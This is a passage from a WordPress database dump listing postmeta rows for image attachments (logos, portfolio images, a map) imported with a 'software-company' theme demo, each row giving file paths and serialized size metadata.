eywords\";a:0:{}}}'),
(5176,2098,'dt-img-hide-title','1'),
(5177,2098,'_the7_imported_item','software-company'),
(5178,2196,'_wp_attached_file','2016/02/por015.jpg'),
(5179,2196,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:900;s:6:\"height\";i:600;s:4:\"file\";s:18:\"2016/02/por015.jpg\";s:8:\"filesize\";i:78464;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"por015-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13206;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"por015-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6469;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"por015-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51075;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5180,2196,'dt-img-hide-title','1'),
(5181,2196,'_the7_imported_item','software-company'),
(5182,2106,'_wp_attached_file','2016/02/po017.jpg'),
(5183,2106,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:900;s:6:\"height\";i:600;s:4:\"file\";s:17:\"2016/02/po017.jpg\";s:8:\"filesize\";i:66321;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"po017-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10618;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"po017-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5761;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"po017-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39362;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5184,2106,'dt-img-hide-title','1'),
(5185,2106,'_the7_imported_item','software-company'),
(5186,2108,'_wp_attached_file','2016/02/po018.jpg'),
(5187,2108,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:900;s:6:\"height\";i:600;s:4:\"file\";s:17:\"2016/02/po018.jpg\";s:8:\"filesize\";i:100131;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"po018-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12818;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"po018-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6097;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"po018-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53044;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5188,2108,'dt-img-hide-title','1'),
(5189,2108,'_the7_imported_item','software-company'),
(5190,2117,'_wp_attached_file','2016/01/po020.jpg'),
(5191,2117,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:900;s:6:\"height\";i:600;s:4:\"file\";s:17:\"2016/01/po020.jpg\";s:8:\"filesize\";i:141588;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"po020-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16363;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"po020-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7683;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"po020-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74610;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5192,2117,'dt-img-hide-title','1'),
(5193,2117,'_the7_imported_item','software-company'),
(5194,2120,'_wp_attached_file','2016/01/po021.jpg'),
(5195,2120,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:900;s:6:\"height\";i:600;s:4:\"file\";s:17:\"2016/01/po021.jpg\";s:8:\"filesize\";i:94472;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"po021-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13806;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"po021-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6756;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"po021-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55517;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5196,2120,'dt-img-hide-title','1'),
(5197,2120,'_the7_imported_item','software-company'),
(5198,2197,'_wp_attached_file','2018/06/slider-trade-logo.png'),
(5199,2197,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:109;s:6:\"height\";i:131;s:4:\"file\";s:29:\"2018/06/slider-trade-logo.png\";s:8:\"filesize\";i:5258;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5200,2197,'dt-img-hide-title','1'),
(5201,2197,'_the7_imported_item','software-company'),
(5202,2198,'_wp_attached_file','2018/06/art-sl.png'),
(5203,2198,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:548;s:6:\"height\";i:550;s:4:\"file\";s:18:\"2018/06/art-sl.png\";s:8:\"filesize\";i:22964;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"art-sl-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:34755;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"art-sl-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9266;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5204,2198,'dt-img-hide-title','1'),
(5205,2198,'_the7_imported_item','software-company'),
(5206,2199,'_wp_attached_file','2018/06/logo04.jpg'),
(5207,2199,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2018/06/logo04.jpg\";s:8:\"filesize\";i:6331;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"logo04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3119;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5208,2199,'dt-img-hide-title','1'),
(5209,2199,'_the7_imported_item','software-company'),
(5210,2200,'_wp_attached_file','2018/06/logo05.jpg'),
(5211,2200,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2018/06/logo05.jpg\";s:8:\"filesize\";i:8058;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"logo05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3522;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5212,2200,'dt-img-hide-title','1'),
(5213,2200,'_the7_imported_item','software-company'),
(5214,2201,'_wp_attached_file','2018/06/logo07.jpg'),
(5215,2201,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2018/06/logo07.jpg\";s:8:\"filesize\";i:9156;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"logo07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4138;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5216,2201,'dt-img-hide-title','1'),
(5217,2201,'_the7_imported_item','software-company'),
(5218,2202,'_wp_attached_file','2018/06/logo08.jpg'),
(5219,2202,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2018/06/logo08.jpg\";s:8:\"filesize\";i:4785;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"logo08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2557;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5220,2202,'dt-img-hide-title','1'),
(5221,2202,'_the7_imported_item','software-company'),
(5222,2178,'_wp_attached_file','2018/06/logo09.jpg'),
(5223,2178,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2018/06/logo09.jpg\";s:8:\"filesize\";i:4888;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"logo09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2912;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5224,2178,'dt-img-hide-title','1'),
(5225,2178,'_the7_imported_item','software-company'),
(5226,2179,'_wp_attached_file','2018/06/logo10.jpg'),
(5227,2179,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2018/06/logo10.jpg\";s:8:\"filesize\";i:5951;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"logo10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3286;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5228,2179,'dt-img-hide-title','1'),
(5229,2179,'_the7_imported_item','software-company'),
(5230,2182,'_wp_attached_file','2018/06/logo13.jpg'),
(5231,2182,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2018/06/logo13.jpg\";s:8:\"filesize\";i:6515;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"logo13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3309;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5232,2182,'dt-img-hide-title','1'),
(5233,2182,'_the7_imported_item','software-company'),
(5234,2184,'_wp_attached_file','2018/06/logo15.jpg'),
(5235,2184,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2018/06/logo15.jpg\";s:8:\"filesize\";i:9956;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"logo15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4197;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5236,2184,'dt-img-hide-title','1'),
(5237,2184,'_the7_imported_item','software-company'),
(5238,2186,'_wp_attached_file','2018/06/logo18.jpg'),
(5239,2186,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2018/06/logo18.jpg\";s:8:\"filesize\";i:8565;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"logo18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4206;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5240,2186,'dt-img-hide-title','1'),
(5241,2186,'_the7_imported_item','software-company'),
(5242,2188,'_wp_attached_file','2018/06/logo19.jpg'),
(5243,2188,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2018/06/logo19.jpg\";s:8:\"filesize\";i:5296;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"logo19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3039;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5244,2188,'dt-img-hide-title','1'),
(5245,2188,'_the7_imported_item','software-company'),
(5246,2203,'_wp_attached_file','2018/06/logo20.jpg'),
(5247,2203,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2018/06/logo20.jpg\";s:8:\"filesize\";i:10245;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"logo20-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4245;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5248,2203,'dt-img-hide-title','1'),
(5249,2203,'_the7_imported_item','software-company'),
(5250,2204,'_wp_attached_file','2018/06/logo-small-hd.png'),
(5251,2204,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:426;s:6:\"height\";i:64;s:4:\"file\";s:25:\"2018/06/logo-small-hd.png\";s:8:\"filesize\";i:5573;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"logo-small-hd-300x45.png\";s:5:\"width\";i:300;s:6:\"height\";i:45;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7996;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"logo-small-hd-150x64.png\";s:5:\"width\";i:150;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1414;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5252,2204,'dt-img-hide-title','1'),
(5253,2204,'_the7_imported_item','software-company'),
(5254,2205,'_wp_attached_file','2018/06/logo-small.png'),
(5255,2205,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:213;s:6:\"height\";i:32;s:4:\"file\";s:22:\"2018/06/logo-small.png\";s:8:\"filesize\";i:2616;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"logo-small-150x32.png\";s:5:\"width\";i:150;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1465;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5256,2205,'dt-img-hide-title','1'),
(5257,2205,'_the7_imported_item','software-company'),
(5258,2246,'_wp_attached_file','2018/06/seven-soft-map.jpg'),
(5259,2246,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:600;s:4:\"file\";s:26:\"2018/06/seven-soft-map.jpg\";s:8:\"filesize\";i:136387;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"seven-soft-map-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9805;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"seven-soft-map-1024x512.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78082;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"seven-soft-map-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5611;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"seven-soft-map-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49096;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5260,2246,'dt-img-hide-title','1'),
(5261,2246,'_the7_imported_item','software-company'),
(5262,2250,'_wp_attached_file','2018/06/s-soft-lg.png'),
(5263,2250,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:306;s:6:\"height\";i:38;s:4:\"file\";s:21:\"2018/06/s-soft-lg.png\";s:8:\"filesize\";i:3615;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"s-soft-lg-300x37.png\";s:5:\"width\";i:300;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8722;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"s-soft-lg-150x38.png\";s:5:\"width\";i:150;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1444;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5264,2250,'dt-img-hide-title','1'),
(5265,2250,'_the7_imported_item','software-company'),
(5266,2251,'_wp_attached_file','2018/06/s-soft-lg-hd.png'),
(5267,2251,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:612;s:6:\"height\";i:76;s:4:\"file\";s:24:\"2018/06/s-soft-lg-hd.png\";s:8:\"filesize\";i:7882;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"s-soft-lg-hd-300x37.png\";s:5:\"width\";i:300;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7729;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"s-soft-lg-hd-150x76.png\";s:5:\"width\";i:150;s:6:\"height\";i:76;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1895;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5268,2251,'dt-img-hide-title','1'),
(5269,2251,'_the7_imported_item','software-company'),
(5270,2252,'_wp_attached_file','2018/06/s-soft-lg-sm-hd.png'),
